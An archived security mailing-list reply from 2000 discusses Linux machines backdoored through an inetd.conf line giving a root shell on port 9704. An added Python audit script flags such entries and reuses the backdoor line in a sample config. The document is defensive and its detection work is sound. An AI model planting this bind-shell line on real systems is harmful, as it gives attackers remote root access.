Security Incidents mailing list archives

Re: Possible widespread hole?


From: Jon Lewis <jlewis () LEWIS ORG>
Date: Sun, 27 Aug 2000 13:12:43 -0400

On Sat, 26 Aug 2000 c_patin () HOTMAIL COM wrote:

> Hi guys,
> I was snooping around my box yesterday, and noticed the
> following MAJOR hole listed at the bottom of
> /etc/inetd.conf:
> 9704 stream tcp nowait root /bin/sh sh -i
>
> I have since closed the hole, and placed my box behind a

You mean you closed _that_ hole.

> /etc/inetd.conf. Is this possibly some major hole in a
> package that we both installed, or did we just get hacked by
> the same person. Seems a little weird to just be
> coincidence. Any advice or ideas?

Most likely, you were hacked by either the same script kid or by another
using the same tool kit.  It's also likely you have additional holes such
as backdoors in daemons listening for network connections, perhaps even
additional users in /etc/passwd.

In fact last night, I was looking at some client firewall logs and noticed
some linuxconf scans.  I portscanned the originators and found a linux box
in Korea that had been hacked by a dialup user in Indonesia.  The box in
Korea had a similar hole...root shell on port 8888 via a line added to
inetd.conf.  The hacker there had added a few accounts, and was actually
telnetting in, using the new accounts, both from their dialup and from
another box in Korea.  That second Korean box had your hole...root shell
on 9704.

----------------------------------------------------------------------
 Jon Lewis *jlewis () lewis org*|  I route
 System Administrator        |  therefore you are
 Atlantic Net                |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________
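The backdoor in this thread is a single inetd.conf line that hands an interactive root shell to anyone who connects to a numeric port. Below is an added audit script (not from the thread or its participants) that parses inetd.conf's seven-field format and flags entries whose server program is a shell, use `-i`, bind a bare port number instead of a service name, or run as root; the inetd.conf it reads is a constructed sample, with the post's 9704 line appended.

```python
import re

# Constructed sample inetd.conf; the last line is the backdoor quoted in the post.
SAMPLE_INETD_CONF = """\
# /etc/inetd.conf (constructed example)
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd
#shell  stream  tcp  nowait  root    /usr/sbin/tcpd  in.rshd
9704 stream tcp nowait root /bin/sh sh -i
"""

SHELLS = {"sh", "bash", "ksh", "csh", "tcsh", "zsh", "ash", "dash"}

def parse_inetd_conf(text):
    """Return a dict per active entry: service socktype proto wait user server [args]."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            continue                           # malformed; inetd ignores it too
        service, socktype, proto, wait, user, server = fields[:6]
        entries.append({"line": lineno, "service": service, "socktype": socktype,
                        "proto": proto, "wait": wait, "user": user.split(".")[0],
                        "server": server, "args": fields[6:]})
    return entries

def find_suspicious(entries):
    """Flag entries that look like an interactive-shell backdoor; returns (line, service, reasons)."""
    findings = []
    for e in entries:
        reasons = []
        prog = e["server"].rsplit("/", 1)[-1]          # basename of the server program
        argv0 = e["args"][0] if e["args"] else ""
        if prog in SHELLS or argv0 in SHELLS:
            reasons.append("server program is a shell")
        if "-i" in e["args"]:
            reasons.append("interactive flag")
        if re.fullmatch(r"\d+", e["service"]):
            reasons.append("numeric port instead of a service name")
        if reasons and e["user"] == "root":
            reasons.append("runs as root")
        if reasons:
            findings.append((e["line"], e["service"], reasons))
    return findings

if __name__ == "__main__":
    for line, svc, why in find_suspicious(parse_inetd_conf(SAMPLE_INETD_CONF)):
        print(f"line {line}: service {svc}: {', '.join(why)}")
```

Pointing it at a real file (`open("/etc/inetd.conf").read()`) gives the same report; as the reply notes, a clean inetd.conf does not rule out other backdoors or extra accounts in /etc/passwd.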

